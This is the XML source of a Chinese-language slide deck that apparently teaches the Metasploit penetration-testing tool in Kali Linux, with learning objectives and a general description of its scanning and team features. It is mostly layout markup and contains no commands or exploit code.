                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Text Placeholder 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16635" y="6800"/>
              <a:ext cx="1600" cy="484"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buNone/>
                <a:defRPr sz="2000" b="1" baseline="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="457200" indent="0">
                <a:buNone/>
                <a:defRPr sz="1200"/>
              </a:lvl2pPr>
              <a:lvl3pPr marL="914400" indent="0">
                <a:buNone/>
                <a:defRPr sz="1000"/>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1371600" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl4pPr>
              <a:lvl5pPr marL="1828800" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl5pPr>
              <a:lvl6pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl6pPr>
              <a:lvl7pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl7pPr>
              <a:lvl8pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl8pPr>
              <a:lvl9pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>项目评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4505325" y="1420495"/>
            <a:ext cx="2266950" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>学习路径</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3358515" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【学习目标】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="7602220" cy="1362075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1.掌握Metasploit工具的启动方法。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2.掌握Metasploit工具的常用命令。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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15" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3358515" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目分析】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3303905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:t>学习Kali Linux操作系统中Metasploit工具的基本命令和msf数据库的基本使用方法。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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15" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3358515" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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a:xfrm>
            <a:off x="5610860" y="1179195"/>
            <a:ext cx="5622925" cy="3809912"/>
            <a:chOff x="5965546" y="1815424"/>
            <a:chExt cx="6989445" cy="2613433"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5965546" y="1815424"/>
              <a:ext cx="547789" cy="324944"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6512281" y="2086296"/>
              <a:ext cx="6442710" cy="2342561"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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285750" indent="-285750" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Metasploit工具能够自动发现和利用过程,并提供执行测试过程中的手动测试阶段所需的工具。可以使用 Metasploit 工具扫描开放的端口和服务，进一步深入网络收集证据并创建测试结果报告。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Metasploit是多用户协作工具，可允许测试团队的成员共享任务和信息。借助团队协作功能，可以将测试分为多个部分，为成员分配特定的网段进行测试。团队成员可以共享宿主数据,查看收集的证据并创建宿主注释以共享特定目标的知识。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
